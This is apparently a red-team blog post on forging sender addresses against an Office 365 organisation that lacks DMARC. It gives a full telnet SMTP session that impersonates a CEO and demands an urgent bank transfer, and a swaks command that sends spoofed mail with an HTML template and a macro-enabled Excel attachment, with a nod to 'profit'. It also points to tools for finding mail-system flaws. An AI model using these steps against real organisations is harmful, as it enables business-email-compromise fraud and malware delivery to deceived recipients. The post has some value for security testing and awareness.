Recently, during my research, I came across an organization that was using O365 for emails. While, during the initial recon, I skipped over the fact that they didn't have a DMARC, it clicked me when I was reading over my notes.

Background Info:

Email Provider : O365

SPF: Exists (v=spf1 ip4:192.168.0.0/24 -all)

DMARC: Do not exist

If you don't like nslookup commands, you can check this on MXtoolbox as well

TIP: If it exists check if p=None is set. p=none means DMARC policy of reject or quarantine isn't enforced

Technical Background

An email consists of two parts an SMTP envelope and Message data. Below is a pictorial representation

SPF verifies HELO/EHLO

DKIM: Verify the DKIM-signature of the sender

DMARC: checks alignment between 'From' and 'Mail From'

In Conclusion, if DMARC isn't present, there is no way to verify the alignment between the 'MAIL FROM' and 'FROM' fields. If the receiving user only sees 'FROM' then an attacker is free to forge anything. Simply put, an attacker can put any email address he likes in the 'FROM' field and the receiving user will see that the email is coming from the forged 'FROM' address.

Current Exploitation Methods:

Quick guides I found on exploiting DMARC not present issue also known as "SPF-BYPASS" are as follows

https://github.com/Rices/spf-bypass

https://o365info.com/how-to-simulate-spoof-e-mail-attack-and-bypass-spf-sender-verification-part2-of-2/

Info Extract from above methods

Info Extract from the above methods

So to spoof following actions must be performed

Step 1: Buy a domain or configure a subdomain (I'll be using a subdomain: fook.redteam.cafe)

Step 2: Get a VPS that allows SMTP. I'm using DigitalOcean.

Step 3: Set the right SPF record on the domain. Example v=spf1 mx a ip4:<Digital OCEAN IP> -all

Step 4: connect via telnet to the target SMTP server. My target org used office365 so we'll telnet to orgname-com.mail.protection.outlook.com

telnet orgname-com.mail.protection.outlook.com 25

Step 5: Perform actions as below

ehlo fook.redteam.cafe
MAIL FROM: attacker@fook.redteam.cafe
RCPT To: victim@orgname.com
data
from: "CEO ORG" <ceo@orgname.com>
to: <victim@orgname.com>
subject: transfer money urgently

Hey send me money at bank account 123456789

.

Enjoy the profit

Missing Automation 🤷‍♂️

So all this is good and everything, but where the hell is automation. As a red teamer, I asked myself these questions

1. Where is automation? Do I send an email by telnet to all my victims? That's boring

2. How do I send an HTML email?

3. How do I send an attachment with my email?

After looking at many telnet automation, I was frustrated. I decided to use SWAKS, the Swiss Army knife for emails.

Instead of doing loads of telnet, manual encoding of messages, lets run this sweet command and be done

./swaks --ehlo fook.redteam.cafe --from attacker@mail.redteam.cafe --to victim@orgname.com --server orgname-com.mail.protection.outlook.com --h-From '"CEO  ORG" <ceo@orgname.com>' --attach-type text/html --attach-body @Mail-Template.html --attach macroexcel.xlsm --attach-type text/html

Is this something new ?

Probaby not, You must have heard about this 100 years ago.

How can I find more issues in the email delivery system?

Well, there is of course the manual way to dig for SPF, DMARC and DKIM. You can also just go to caniphish.com for a quicker way in.

Super Useful Research

While doing some google-fu, I found two very useful projects to test mail delivery systems.

MailSploit - https://github.com/pwnsdx/Mailsploit

espoofer - https://github.com/chenjj/espoofer

These projects will help you discover issues in mail delivery systems. You may even get a 0 day in your pocket 🤷‍♂️ if you choose the right target. Shhhhh

References:

Amazing Blackhat Talk

https://www.blackhat.com/us-20/briefings/schedule/#you-have-no-idea-who-sent-that-email--attacks-on-email-sender-authentication-19902